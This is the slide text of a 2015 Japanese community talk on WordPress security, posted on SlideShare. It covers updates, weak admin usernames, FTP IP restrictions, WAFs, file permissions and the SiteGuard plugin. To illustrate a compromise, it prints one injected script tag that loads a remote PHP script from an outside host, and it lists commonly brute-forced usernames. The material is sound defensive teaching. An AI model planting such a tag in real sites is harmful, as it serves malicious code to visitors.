Advertisement
Word benchfukuoka
Mar. 9, 2015•0 likes•3,719 views
1 likes
Be the first to like this
Show More
views
Total views
0
On Slideshare
0
From embeds
0
Number of embeds
0
Download to read offline
Report
Internet
WordBenchFukuoka in FUKUOKA MEETUP COMMUNITY
Junji MannoFollow
Advertisement
Word benchfukuoka
- WordBench Fukuoka もうそろそろ4.2ベータ1回目くらいかな? 2015年3月7日
- WordPressのセキュリティについて 考える
- 万野 潤二 GMOペパボ 糸島芸農 福岡移住計画
- WordPressのセキュリティについて WordPressの更新 サーバーの脆弱性 ユーザー名とパスワード FTPアクセス制限 WAFの導入 ファイルパーミッション プラグインの利用
- 何が起こっているの? コメント・ピンバックスパム。かつ対象ページにア クセスされるとサーバー負荷に.. サイトとは関係のないサイトへのリダイレクト (URL書き換え)しかもサーチエンジン経由のみ アクセスされるたびに外部スクリプトが実行されて いる.. メール大量配信の踏み台に.. サイトが表示されなくなる。ここで はじめて気づく..
- コードを埋め込まれた例 <!--5va837--><script type="text/javascript" src="http://abcdefg.pl/wp- content/themes/twentyfourteen/ftuhdw7q.php?id=1766503"></ script><!--/5va837-->
- http://www.google.com/safebrowsing/diagnostic?site=http://example.com
- 何で起こっているの? ブルート・フォース・アタック 総当たり・辞書による攻撃 FTPアカウント剥奪 マルウェアに感染し、第三者から不正にFTP接続されファイ ルの設置、改ざんが行われる
- 何で起こっているの? プラグインの脆弱性 最近だとRevSliderプラグインを狙ったマルウェアが10万サイトを 汚染 http://blog.sucuri.net/2014/12/soaksoak-malware-compromises- 100000-wordpress-websites.html その他にもJoomla,WordPressのプラグインなどに使用されている ofc_upload_image.phpの脆弱性 提供元は信頼を失うことにも.. また、使用していないテーマ・プラグインは要削除。
- WordPressの更新 WordPressの自動更新は有効に。 Update Control(プラグイン) 自動バックグラウンド更新の設定を簡単に設定す ることができる。
- サーバーの脆弱性 信頼できるサーバー会社、サービスを利用する。 セキュリティニュース、IPA、JVN などのトピックを チェック。
- ユーザー名とパスワード
- ユーザー名は”admin”であっては ならない by HostGator.com Photo by http://www.pakutaso.com/
- ユーザー名 ブルート・フォース・アタックの標的 •管理者権限剥奪、権限悪用、個人情報漏洩... 攻撃されやすいユーザー名 •admin, test,123456, demo, administrator, root, webmaster...
- ユーザー名 作成されたアカウントadminは削除できない →他の管理者アカウントを作成し削除
- パスワード 安易なパスワードを設定しない。
- FTPアクセス制限 万一FTPアカウント情報が第三者に渡ったら。格好の 侵入経路となり、ファイルの改ざん、設置し放題。 →そもそもFTP接続する場所は限定されるはずなの で、IPアドレスによる制限(.ftpaccess)を実施。 <Limit ALL> Order Allow,Deny Allow from 111.111.111.111 # home Allow from 123.123.123.123 # office Deny from all </Limit>
- WAFの導入 SQLインジェクションやクロスサイトスクリプティング など、Webアプリケーション上の脆弱性をカバーする装 置。 WAFは通常のファイアウォールと同様にすべてのHTTP/ HTTPSトラフィックを中継し、通信の内容を精査する。 GNUライセンスの下で公開されているオープンソースの Webアプリケーションファイアウォール。
- パーミッション WordPressの安全性を高める ファイルパーミッション http://goo.gl/wF1Wpj 600 -rw------- /home/user/wp-config.php 604 -rw----r-- /home/user/cgi-bin/.htaccess 600 -rw------- /home/user/cgi-bin/php.ini 711 -rwx--x--x /home/user/cgi-bin/php.cgi 100 ---x------ /home/user/cgi-bin/php5.cgi ※ wp-config 400 wp-admin/install.php 000
- プラグインの導入
- SiteGuard WP Plugin
- SiteGuard WP Plugin SiteGuard WP Pluginは、WordPressにインストールするだ けで、セキュリティを向上させることができます。 SiteGurad WP Pluginは、管理ページとログインに関する攻 撃からの防御に特化したセキュリティプラグインです。 WAF ( SiteGuard Lite )の除外ルールを作成する機能もあり ます。( 使用するにはWAFがWebサーバにインストール されている必要があります )
- 管理ページアクセス制限 ログインページ変更 画像認証 ログイン詳細エラーメッセー ジの無効化 ログインロック ログインアラート フェールワンス ピンバック無効化 更新通知 WAFチューニングサポー ト SiteGuard WP Plugin
- SiteGuard WP Plugin 管理ページアクセス制限 アクセス元のIPアドレスによる 制限を実施。 アクセス元IPアドレスが複数、 不定期に更新される場合。 会員向けサイト(複数のユー ザ)には利用し難い。
- SiteGuard WP Plugin ログインページ変更 そもそもブルートフォース、リス ト攻撃の標的は wp-login.php なの で、ページそのものを変更する ことが有効。 初期値は「login_(5桁の乱数)」で すが、好みの名前に変更するこ とができる。 例 http://manno.jp/login_38521
- SiteGuard WP Plugin 画像認証 ログインページ、コメント投 稿に画像認証(ひらがな、英 数字)を追加します。
- SiteGuard WP Plugin ログイン詳細エラーメッセー ジの無効化 ログインエラーしたときの詳 細なエラーメッセージに変え て、単一のメッセージを返し ます。
- SiteGuard WP Plugin ログインロック ログイン失敗を繰り返す接 続元を一定期間ロックしま す。 似た機能を持つプラグイン Simple Login Lockdown http:// wordpress.org/extend/plugins/
- SiteGuard WP Plugin ログインアラート ログインがあったことを、 メールで通知します。
- SiteGuard WP Plugin フェールワンス ユーザ名、パスワードが正 しい入力を行っても、ログ インを一回失敗します。
- SiteGuard WP Plugin ピンバック無効化 ピンバックの悪用(スパム) を防ぎます。
- SiteGuard WP Plugin 更新通知 WordPress、プラグイン、 テーマの更新を、メールで 通知
- SiteGuard WP Plugin WAFチューニングサポート webサーバーにJP-Secure製の WAF ( SiteGuard Lite ) が導入 されている場合利用可。 誤検知されたシグネチャの 除外リストを作成する。
- WordPress Codex WordPressの安全性を高める http://goo.gl/qxN5Qx JP Secure SiteGuard WP Plugin http://goo.gl/w4ORQD JVN 脆弱性対策情報データベース http://jvndb.jvn.jp/
Advertisement